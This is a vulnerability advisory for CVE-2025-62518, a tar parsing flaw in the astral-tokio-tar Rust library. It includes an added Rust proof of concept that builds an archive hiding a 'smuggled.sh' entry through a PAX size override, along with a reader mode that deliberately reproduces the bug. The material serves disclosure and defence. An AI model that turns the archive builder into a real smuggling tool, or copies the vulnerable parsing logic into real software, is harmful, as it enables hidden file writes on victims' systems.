Boundary Parsing Vulnerability in Astral-Tokio-Tar Library by Astral
CVE-2025-62518

8.1 HIGH

Key Information:

Vendor: Astral-sh
Status: Vendor
CVE Published: 21 October 2025

What is CVE-2025-62518?

astral-tokio-tar is a library for reading and writing tar archives in async Rust applications. Versions prior to 0.5.6 handle PAX extended headers and ustar headers inconsistently, and an attacker can use that inconsistency to smuggle additional entries into an archive. When an archive contains a PAX extended header with a size record that overrides the size in the following ustar header, the affected parser reports the PAX size for the entry but advances its stream position by the size in the ustar header. The remaining bytes of the file's content are then read as if they were the next tar header, so attacker-controlled file data is interpreted as further archive entries, with names and contents the attacker chooses and that do not appear in the archive's visible listing. A reader is only safe if it advances past an entry's data by the same size it reports for that entry. There is no workaround; users should upgrade to version 0.5.6 or later.
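The following is an added example and is not code from astral-tokio-tar. It contains a minimal std-only ustar/PAX writer and a simplified tar reader with two modes: the fixed mode advances past an entry's data by the size it reports (the PAX override), while the vulnerable mode reports the PAX size but advances by the ustar header's size field, which is the inconsistency described above. The constructed archive holds an entry "outer.txt" whose ustar size is 0 and whose PAX size is the true content length; the content itself is a complete tar entry "smuggled.sh". The entry names, the payload and the "PaxHeader/" naming are constructed for the example, and the reader models only the behaviour relevant to this CVE, not the library's actual parser.

```rust
// Added example (not code from astral-tokio-tar): a toy ustar/PAX writer and a
// reader whose two modes differ only in how they advance past an entry's data.

const BLOCK: usize = 512;

/// Round a length up to the next 512-byte block boundary.
fn padded(len: usize) -> usize {
    (len + BLOCK - 1) / BLOCK * BLOCK
}

/// Build one ustar header block for `name` (assumed shorter than 100 bytes).
fn ustar_header(name: &str, size: usize, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..108].copy_from_slice(b"0000644\0"); // mode
    h[108..116].copy_from_slice(b"0000000\0"); // uid
    h[116..124].copy_from_slice(b"0000000\0"); // gid
    h[124..136].copy_from_slice(format!("{:011o}\0", size).as_bytes()); // size
    h[136..148].copy_from_slice(b"00000000000\0"); // mtime
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    // Checksum is the byte sum of the header with the checksum field read as spaces.
    h[148..156].copy_from_slice(b"        ");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

/// Encode one PAX record "<len> <key>=<value>\n"; <len> counts the whole record.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let base = key.len() + value.len() + 3; // space, '=', newline
    let mut len = base + 1;
    while len.to_string().len() + base != len {
        len += 1;
    }
    format!("{} {}={}\n", len, key, value).into_bytes()
}

/// Append `data` plus zero padding to the next block boundary.
fn push_padded(out: &mut Vec<u8>, data: &[u8]) {
    out.extend_from_slice(data);
    out.resize(out.len() + padded(data.len()) - data.len(), 0);
}

/// Constructed malicious archive: outer.txt has ustar size 0 and a PAX size
/// override, and its content is itself a complete tar entry (smuggled.sh).
fn build_malicious_archive() -> Vec<u8> {
    let payload = b"#!/bin/sh\necho smuggled\n"; // constructed payload
    let mut outer_content = Vec::new();
    outer_content.extend_from_slice(&ustar_header("smuggled.sh", payload.len(), b'0'));
    push_padded(&mut outer_content, payload);

    let mut tar = Vec::new();
    let pax = pax_record("size", &outer_content.len().to_string());
    tar.extend_from_slice(&ustar_header("PaxHeader/outer.txt", pax.len(), b'x'));
    push_padded(&mut tar, &pax);
    tar.extend_from_slice(&ustar_header("outer.txt", 0, b'0')); // ustar size 0
    push_padded(&mut tar, &outer_content);
    let readme = b"hello\n";
    tar.extend_from_slice(&ustar_header("README.txt", readme.len(), b'0'));
    push_padded(&mut tar, readme);
    tar.resize(tar.len() + 2 * BLOCK, 0); // end-of-archive marker
    tar
}

fn parse_octal(field: &[u8]) -> Result<usize, String> {
    let s: String = field.iter().take_while(|&&b| b != 0 && b != b' ').map(|&b| b as char).collect();
    usize::from_str_radix(&s, 8).map_err(|e| format!("bad octal {:?}: {}", s, e))
}

fn checksum_ok(block: &[u8]) -> bool {
    let stored = match parse_octal(&block[148..156]) { Ok(v) => v, Err(_) => return false };
    let computed: usize = block.iter().enumerate()
        .map(|(i, &b)| if (148..156).contains(&i) { b' ' as usize } else { b as usize })
        .sum();
    stored == computed
}

/// Return the `size` record from PAX extended header data, if present.
fn pax_size(data: &[u8]) -> Option<usize> {
    let mut rest = data;
    while !rest.is_empty() {
        let sp = rest.iter().position(|&b| b == b' ')?;
        let len: usize = std::str::from_utf8(&rest[..sp]).ok()?.parse().ok()?;
        if len == 0 || len > rest.len() { return None; }
        let record = std::str::from_utf8(&rest[sp + 1..len]).ok()?;
        let (key, value) = record.trim_end_matches('\n').split_once('=')?;
        if key == "size" { return value.parse().ok(); }
        rest = &rest[len..];
    }
    None
}

/// List (name, reported size). `honor_pax_for_advance == true` is the fixed
/// behaviour; `false` models the bug: size taken from PAX, stream advanced by
/// the ustar size field, so the entry's content is parsed as further headers.
fn list_entries(archive: &[u8], honor_pax_for_advance: bool) -> Result<Vec<(String, usize)>, String> {
    let (mut pos, mut pending_pax_size, mut entries) = (0usize, None::<usize>, Vec::new());
    while pos + BLOCK <= archive.len() {
        let block = &archive[pos..pos + BLOCK];
        if block.iter().all(|&b| b == 0) { break; } // end-of-archive
        if !checksum_ok(block) { return Err(format!("bad header checksum at offset {}", pos)); }
        let name: String = block[..100].iter().take_while(|&&b| b != 0).map(|&b| b as char).collect();
        let ustar_size = parse_octal(&block[124..136])?;
        let typeflag = block[156];
        pos += BLOCK;
        if pos + ustar_size > archive.len() { return Err("truncated archive".into()); }
        if typeflag == b'x' {
            pending_pax_size = pax_size(&archive[pos..pos + ustar_size]);
            pos += padded(ustar_size);
            continue;
        }
        let reported = pending_pax_size.take().unwrap_or(ustar_size);
        entries.push((name, reported));
        pos += padded(if honor_pax_for_advance { reported } else { ustar_size });
    }
    Ok(entries)
}

fn main() {
    let tar = build_malicious_archive();
    println!("fixed reader:      {:?}", list_entries(&tar, true));
    println!("vulnerable reader: {:?}", list_entries(&tar, false));
}
```

The fixed reader lists two entries, outer.txt and README.txt, with outer.txt's 1024-byte content treated as opaque data. The vulnerable reader lists three: after outer.txt it resumes at the start of outer.txt's content, finds a valid header there and yields smuggled.sh, then lands on README.txt exactly where the fixed reader does, so the two listings differ only by the hidden entry. An extractor driven by the vulnerable listing would write smuggled.sh to disk even though no such entry is visible to a correct reader.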

Affected Version(s)

astral-tokio-tar < 0.5.6

CVSS V3.1

Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Score: 8.1
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
User Interaction: None
Scope: Unchanged

Timeline

  • Vulnerability published: 21 October 2025

  • Vulnerability reserved
